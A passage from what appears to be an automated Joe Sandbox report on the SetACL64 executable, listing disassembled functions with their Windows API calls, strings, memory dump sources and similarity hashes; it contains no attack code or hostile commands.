Instruction Fuzzy Hash: C781A6A2B09BC685EB349F34D8453ED2352FBA17C8F809175D64CD7A9ADF69D684C300

Function 00007FF6970486B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697048719
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF697048764
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6970487F4
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697048846
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69704886B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF697048895
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69704891E

Strings

bad locale name, xrefs: 00007FF697048817

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_Locinfo_ctor
String ID: bad locale name
API String ID: 3718194943-1405518554
Opcode ID: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
Instruction ID: 0b3019a460d377b0614b7a54f6973b9fc49de7070026924a3f0f2ad6768d1189
Opcode Fuzzy Hash: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
Instruction Fuzzy Hash: 07618EA2B09A4189FB25DF61D8512BC33B4FF947C4F0844B5DA4DE3A95DE38E862D308

Function 00007FF697048F40 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697048FAE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF697048FF6
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69704909D
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6970490E6
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69704910B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF697049135
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6970491BE

Strings

bad locale name, xrefs: 00007FF6970490C0

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_Locinfo_ctor
String ID: bad locale name
API String ID: 3718194943-1405518554
Opcode ID: 1a3bb911b4edc9c961d994df47ad412ba050329201994a1f2ddff9c2ca2b1207
Instruction ID: 03103ae787afa363193b17837bc553153aea61e1f2dbbaf6d173e0b30ce89f29
Opcode Fuzzy Hash: 1a3bb911b4edc9c961d994df47ad412ba050329201994a1f2ddff9c2ca2b1207
Instruction Fuzzy Hash: DF716DA2B19A4189FB24DF61D8542BC23B4EFA47C8F0844B5DA4DD7A95EF38E426D304

Function 00007FF697044D30 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32 ref: 00007FF697044D91
GetLastError.KERNEL32 ref: 00007FF697044D9F

Part of subcall function 00007FF69704BF60: GetLastError.KERNEL32 ref: 00007FF69704BFCE

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044F9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044FA1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044FA7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044FAD

Strings

GetComputerNameAPIWrapper, xrefs: 00007FF697044E0F
Querying the computer name failed with: , xrefs: 00007FF697044DBD

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$ComputerName
String ID: GetComputerNameAPIWrapper$Querying the computer name failed with:
API String ID: 3471954800-1594087890
Opcode ID: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
Instruction ID: e4a1ed9dd5080ae0d623dce17014ec4b8e431d52638a781814cf310d552d5d69
Opcode Fuzzy Hash: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
Instruction Fuzzy Hash: 4651C9A2F1978281EA249B25E4453AD63A1FB957E4F405375EA5CC3BD9EF7CE080C700

Function 00007FF6970941C8 Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF697093EF8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF697093F39
Part of subcall function 00007FF697093EF8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF697093FB9
Part of subcall function 00007FF697093EF8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69709400D
Part of subcall function 00007FF697093EF8: _get_daylight.LIBCMT ref: 00007FF697094065

CreateFileW.KERNEL32 ref: 00007FF6970942CE
CreateFileW.KERNEL32 ref: 00007FF69709431E
GetLastError.KERNEL32 ref: 00007FF69709434E
GetFileType.KERNEL32 ref: 00007FF697094363
GetLastError.KERNEL32 ref: 00007FF69709436D
CloseHandle.KERNEL32 ref: 00007FF6970943A0
CloseHandle.KERNEL32 ref: 00007FF6970944FB
CreateFileW.KERNEL32 ref: 00007FF697094530
GetLastError.KERNEL32 ref: 00007FF69709453F

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
String ID:
API String ID: 1330151763-0
Opcode ID: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
Instruction ID: 2e09df35ed57b5397f5888805df9e4f86d6e56be1065bcefb7caa7602984ab0c
Opcode Fuzzy Hash: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
Instruction Fuzzy Hash: 16C1AFB2B24A4286EB20CFA9D4816AD3760FB59BE8B504365EE2ED77D4DF38D051C300

Function 00007FF69706F660 Relevance: 13.7, APIs: 9, Instructions: 247COMMON

Download Yara Rule

APIs

IsValidSid.ADVAPI32 ref: 00007FF69706F6F8
IsValidSid.ADVAPI32 ref: 00007FF69706F70B
EqualSid.ADVAPI32 ref: 00007FF69706F71C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F9A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F9AC

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Valid_invalid_parameter_noinfo_noreturn$Equal
String ID:
API String ID: 2161274208-0
Opcode ID: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
Instruction ID: 31da44f189a5a11e09a4eb5c16883fa606f0b6d08989bf66697a44825e308720
Opcode Fuzzy Hash: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
Instruction Fuzzy Hash: 2F91BDA2A19A4291EA34DB11E85437E73A1FB85BE4F445671EA5DC7798EF3CF680C300

Function 00007FF697075B20 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 313COMMONLIBRARYCODE

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF697075B7C

Part of subcall function 00007FF697077D80: _GetEstablisherFrame.LIBVCRUNTIME ref: 00007FF697077DB5
Part of subcall function 00007FF697077D80: __GetUnwindTryBlock.LIBCMT ref: 00007FF697077DC3
Part of subcall function 00007FF697077D80: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF697077DE8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF697075C54
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF697075E9A
_GetEstablisherFrame.LIBVCRUNTIME ref: 00007FF697075EEC

Strings

csm, xrefs: 00007FF697075BFD
csm, xrefs: 00007FF697075C77
csm, xrefs: 00007FF697075B96

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchState
String ID: csm$csm$csm
API String ID: 40297248-393685449
Opcode ID: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
Instruction ID: a1a674f428fd6e7dcd5ae1e2f9c0a9d7df2a752657addbce72ad52b884103f0b
Opcode Fuzzy Hash: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
Instruction Fuzzy Hash: 24D17CB2E08B818AEB309B6598412AD77A0FB45BD8F140175EE8DD7B89DF38E591C740

Function 00007FF69704C7D0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 291timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF69704C826
FileTimeToSystemTime.KERNEL32 ref: 00007FF69704C84A
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF69704C85B
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF69704C86B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704CB04

Strings

%04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d, xrefs: 00007FF69704C8EC
-, xrefs: 00007FF69704C8BD

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Time$File$System$Local$Specific_invalid_parameter_noinfo_noreturn
String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d$-
API String ID: 1697026759-531884627
Opcode ID: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
Instruction ID: d0c207fb06b7ee0375b04034d872873cd745b7d7c38e3ca865f8775ca97a9710
Opcode Fuzzy Hash: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
Instruction Fuzzy Hash: 22D13B76618B8186DB20DF15F4806AEB7A5FB88BD4F505136EA8D83B68EF3CD554CB00

Function 00007FF6970706C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6970708C0: IsValidSid.ADVAPI32(?,?,?,00007FF69707034D,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF6970708E2
Part of subcall function 00007FF6970708C0: GetLengthSid.ADVAPI32(?,?,?,00007FF69707034D,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF6970708F3

IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF697070516,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF697070789
IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF697070516,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF69707079C
EqualSid.ADVAPI32(?,?,?,?,?,?,00007FF697070516,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF6970707AE

Strings

invalid hash bucket count, xrefs: 00007FF6970708AD

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Valid$EqualLength
String ID: invalid hash bucket count
API String ID: 2688289545-1101463472
Opcode ID: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
Instruction ID: 50c34d9ee5f35df04e8546175fcc7b5a2c88b619896d8af18c344b7784606328
Opcode Fuzzy Hash: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
Instruction Fuzzy Hash: 4651E5B6A05B81C2EB64CF12E94412D73A8FB48BD4B058676DB9DC7B94DF38E4A0C350

Function 00007FF69704A980 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69704A996
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69704A9BB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69704A9E5

Part of subcall function 00007FF69704A7F0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69704A859
Part of subcall function 00007FF69704A7F0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF69704A8A4
Part of subcall function 00007FF69704A7F0: _Getctype.LIBCPMT ref: 00007FF69704A8BC
Part of subcall function 00007FF69704A7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69704A94C

std::_Facet_Register.LIBCPMT ref: 00007FF69704AA54
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69704AA6E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69704AA83

Strings

asio.system, xrefs: 00007FF69704AA90

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeLocinfo::_Locinfo_ctorRegister
String ID: asio.system
API String ID: 2324539378-4188385678
Opcode ID: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
Instruction ID: 57c8cc1fde356bb806a6c80d2ec63ace1a497e24226ea4db002863e42045fb4e
Opcode Fuzzy Hash: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
Instruction Fuzzy Hash: 7F318FE2A08A4285EE25DB55E9811B96360FF94BD0F0805B1DA4DC37E5EF2CE9A1D300

Function 00007FF69703C870 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69703C886
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69703C8AB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69703C8D5
std::_Facet_Register.LIBCPMT ref: 00007FF69703C944
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69703C95E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69703C973

Strings

\\?\UNC\, xrefs: 00007FF69703C877

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: \\?\UNC\
API String ID: 2081738530-3025105874
Opcode ID: e61a02660369b208d4869bf3317d8eeecda6ec06fbff3dc1bbd376d3e95adc6e
Instruction ID: fb594eda63022736cc8ea67f14766799e5689a186db1d06f1bf128df56800812
Opcode Fuzzy Hash: e61a02660369b208d4869bf3317d8eeecda6ec06fbff3dc1bbd376d3e95adc6e
Instruction Fuzzy Hash: 663193A1A08A4281EE359F25E8401BA6360FF94BD4F1846B2DA5DC77E5EF7CF952C300

Function 00007FF697069D50 Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32 ref: 00007FF697069DE8
GetLastError.KERNEL32 ref: 00007FF697069DF2
GetAce.ADVAPI32 ref: 00007FF697069E29
IsValidSid.ADVAPI32 ref: 00007FF697069E44
DeleteAce.ADVAPI32 ref: 00007FF697069EA3
GetLastError.KERNEL32 ref: 00007FF697069ED1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697069F98
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697069F9E

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast_invalid_parameter_noinfo_noreturn$DeleteInformationValid
String ID:
API String ID: 2376240148-0
Opcode ID: c39aa1aca0cd00dc7d4238e9c45bf37263b6fe557bd30a66a51f3a55d98a4b0b
Instruction ID: 0622f9c239c7a9fcfbaea39a44bb9dc7912d74bdb161c8708b1f5fb2f3c95c5e
Opcode Fuzzy Hash: c39aa1aca0cd00dc7d4238e9c45bf37263b6fe557bd30a66a51f3a55d98a4b0b
Instruction Fuzzy Hash: 65616EB2B29A4285EB20CF65D4A43AD33A5FF44BD8F404675DA4DD7B84DE38D6858304

Function 00007FF697091F54 Relevance: 10.8, APIs: 7, Instructions: 291COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69709238A

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: afec629c5f4bc3d22fdb666a622b719d5a39a1b1c9c1880e9f511aada66a8680
Instruction ID: 952427af6bd12ed53fd67e0a158e34a776cb59ec0308e7be88b75c316c777fce
Opcode Fuzzy Hash: afec629c5f4bc3d22fdb666a622b719d5a39a1b1c9c1880e9f511aada66a8680
Instruction Fuzzy Hash: ECC102B2B0C78791EB799B1598002BD6BA1FBA1BC0F4442B1DA4EC7792DE7CE855C300

Function 00007FF69706C766 Relevance: 10.7, APIs: 7, Instructions: 213fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706C895
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706C89B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706C8A1
CreateFileW.KERNEL32 ref: 00007FF69706C913
GetLastError.KERNEL32 ref: 00007FF69706C922
CreateFileW.KERNEL32 ref: 00007FF69706CA06

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CreateFile$ErrorLast
String ID:
API String ID: 2384231905-0
Opcode ID: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
Instruction ID: f39b2ddd8f88ad9e41d53b8aa503fe2513415d478c7394d118f99c172d5d71a0
Opcode Fuzzy Hash: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
Instruction Fuzzy Hash: B98182B2B1564285EB20DB25E46836E3361EB84BE8F404671DA5DC77E9EE3DE580C340

Function 00007FF69706C6A3 Relevance: 10.7, APIs: 7, Instructions: 181fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706C89B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706C8A1
CreateFileW.KERNEL32 ref: 00007FF69706C913
GetLastError.KERNEL32 ref: 00007FF69706C922
CreateFileW.KERNEL32 ref: 00007FF69706CA06

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CreateFile_invalid_parameter_noinfo_noreturn$ErrorLast
String ID:
API String ID: 4071529928-0
Opcode ID: 86a63f8ac1b34f836c6370ff0e3d0cf0e1df9ed1dc5296b969972eb07ba71060
Instruction ID: d97aee19bc855c5619fe3f8cb8ff5fb725f76665d3a9b4935664ab3d1cdfa36b
Opcode Fuzzy Hash: 86a63f8ac1b34f836c6370ff0e3d0cf0e1df9ed1dc5296b969972eb07ba71060
Instruction Fuzzy Hash: 6F5193B2A0464285EB24DB25E46836E3361EB84BE8F504671DB5DC77E5EF3DE580C340

Function 00007FF697043670 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6970436D9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF697043724
_Getctype.LIBCPMT ref: 00007FF69704373C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6970437F4

Strings

boost::too_few_args: format-string referred to more arguments than were passed, xrefs: 00007FF697043830
bad locale name, xrefs: 00007FF697043817

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

